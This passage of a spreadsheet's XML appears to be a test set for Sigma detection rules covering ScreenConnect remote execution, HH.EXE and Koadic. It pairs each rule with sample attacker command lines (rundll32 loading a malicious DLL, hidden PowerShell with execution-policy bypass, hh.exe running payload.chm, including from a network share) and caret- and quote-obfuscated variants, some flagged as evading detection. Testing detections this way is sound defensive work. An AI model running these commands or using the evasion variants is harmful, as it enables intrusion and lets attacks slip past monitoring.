          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E2484" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\GTHREA~1.DLL,EntryPoint</t>
        </is>
      </c>
      <c r="F2484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2484" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2484" s="43" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J2484" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2484" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2485" ht="15.75" customHeight="1" s="42">
      <c r="A2485" s="43" t="n"/>
      <c r="B2485" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C2485" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D2485" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E2485" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\TEMP\ScreenConnect\23.6.8.8644\malicious.dll,Start</t>
        </is>
      </c>
      <c r="F2485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2485" s="43" t="n"/>
      <c r="J2485" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2485" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2486" ht="15.75" customHeight="1" s="42">
      <c r="A2486" s="43" t="n"/>
      <c r="B2486" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C2486" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D2486" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E2486" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Windows\TEMP\ScreenConnect\23.6.8.8644\tool.ps1</t>
        </is>
      </c>
      <c r="F2486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2486" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2486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2486" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2486" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2487" ht="15.75" customHeight="1" s="42">
      <c r="A2487" s="43" t="n"/>
      <c r="B2487" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C2487" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D2487" s="44" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E2487" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exeCUtionpOlICY Bypass -wIndoWstyLe Hidden -f C:\Windows\TEMP\ScreenConnect\23.6.8.8644\tool.ps1</t>
        </is>
      </c>
      <c r="F2487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2487" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2487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2487" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2487" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2488" ht="15.75" customHeight="1" s="42">
      <c r="A2488" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2488" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2488" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2488" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2488" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F2488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2488" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2488" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2488" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2488" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2489" ht="15.75" customHeight="1" s="42">
      <c r="A2489" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2489" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2489" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2489" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2489" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F2489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2489" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2489" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2489" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2489" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2490" ht="15.75" customHeight="1" s="42">
      <c r="A2490" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2490" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2490" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2490" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2490" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F2490" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2490" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2490" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2490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490" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2490" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2491" ht="15.75" customHeight="1" s="42">
      <c r="A2491" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2491" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2491" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2491" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2491" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F2491" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2491" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2491" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2491" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2491" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2491" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2492" ht="15.75" customHeight="1" s="42">
      <c r="A2492" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2492" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2492" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2492" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2492" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F2492" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2492" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2492" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2492" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2492" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2492" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2493" ht="15.75" customHeight="1" s="42">
      <c r="A2493" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2493" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2493" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2493" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2493" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2493" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2493" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2493" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2493" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2493" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2493" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2494" ht="15.75" customHeight="1" s="42">
      <c r="A2494" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2494" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2494" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2494" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2494" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2494" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2494" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2494" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2494" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2494" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2494" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2495" ht="15.75" customHeight="1" s="42">
      <c r="A2495" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2495" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2495" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2495" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2495" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2495" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2495" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2495" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2495" s="43" t="n"/>
      <c r="J2495" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2495" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2496" ht="15.75" customHeight="1" s="42">
      <c r="A2496" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2496" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2496" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2496" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2496" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2496" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2496" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2496" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2496" s="44" t="n"/>
      <c r="J2496" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2496" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2497" ht="15.75" customHeight="1" s="42">
      <c r="A2497" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2497" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2497" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2497" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2497" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F2497" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2497" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2497" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2497" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2497" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2497" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2498" ht="15.75" customHeight="1" s="42">
      <c r="A2498" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2498" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2498" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2498" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2498" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F2498" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2498" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2498" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2498" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2498" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2498" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2499" ht="15.75" customHeight="1" s="42">
      <c r="A2499" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2499" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2499" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2499" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2499" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F2499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2499" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2499" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2499" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2499" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2500" ht="15.75" customHeight="1" s="42">
      <c r="A2500" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B2500" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2500" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2500" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2500" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F2500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2500" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2500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500" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2500" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2501" ht="15.75" customHeight="1" s="42">
      <c r="A2501" s="43" t="n"/>
      <c r="B2501" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2501" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2501" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2501" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"^q" /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2501" s="44" t="n"/>
      <c r="J2501" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2501" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2502" ht="15.75" customHeight="1" s="42">
      <c r="A2502" s="43" t="n"/>
      <c r="B2502" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2502" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2502" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2502" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"^q" /"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2502" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2502" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2502" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2502" s="44" t="n"/>
      <c r="J2502" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2502" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2503" ht="15.75" customHeight="1" s="42">
      <c r="A2503" s="43" t="n"/>
      <c r="B2503" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2503" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2503" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2503" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"^q" /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2503" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2503" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2503" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2503" s="43" t="n"/>
      <c r="J2503" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2503" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2504" ht="15.75" customHeight="1" s="42">
      <c r="A2504" s="43" t="n"/>
      <c r="B2504" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2504" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2504" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2504" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2504" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2504" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2504" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2504" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2504" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2504" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2505" ht="15.75" customHeight="1" s="42">
      <c r="A2505" s="43" t="n"/>
      <c r="B2505" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2505" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2505" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2505" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^Q /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2505" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2505" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2505" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2505" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2505" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2505" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2506" ht="15.75" customHeight="1" s="42">
      <c r="A2506" s="43" t="n"/>
      <c r="B2506" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2506" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2506" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2506" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^Q /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2506" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2506" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2506" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2506" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2506" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2506" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2507" ht="15.75" customHeight="1" s="42">
      <c r="A2507" s="43" t="n"/>
      <c r="B2507" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2507" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2507" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2507" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q -"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2507" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2507" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2507" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2507" s="43" t="n"/>
      <c r="J2507" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2507" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2508" ht="15.75" customHeight="1" s="42">
      <c r="A2508" s="43" t="n"/>
      <c r="B2508" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2508" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2508" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2508" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q /"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2508" s="43" t="n"/>
      <c r="J2508" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2508" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2509" ht="15.75" customHeight="1" s="42">
      <c r="A2509" s="43" t="n"/>
      <c r="B2509" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2509" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2509" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2509" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"^q" /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2509" s="43" t="n"/>
      <c r="J2509" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2509" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2510" ht="15.75" customHeight="1" s="42">
      <c r="A2510" s="43" t="n"/>
      <c r="B2510" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2510" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2510" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2510" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q -"c" "ch" "cp" 1252</t>
        </is>
      </c>
      <c r="F2510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2510" s="44" t="n"/>
      <c r="J2510" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2510" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2511" ht="15.75" customHeight="1" s="42">
      <c r="A2511" s="43" t="n"/>
      <c r="B2511" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2511" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2511" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2511" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /Q -"c" "ch" "cp" 1252</t>
        </is>
      </c>
      <c r="F2511" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2511" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2511" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2511" s="44" t="n"/>
      <c r="J2511" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2511" s="44" t="b">
        <v>1</v>
      </c>
    </row>
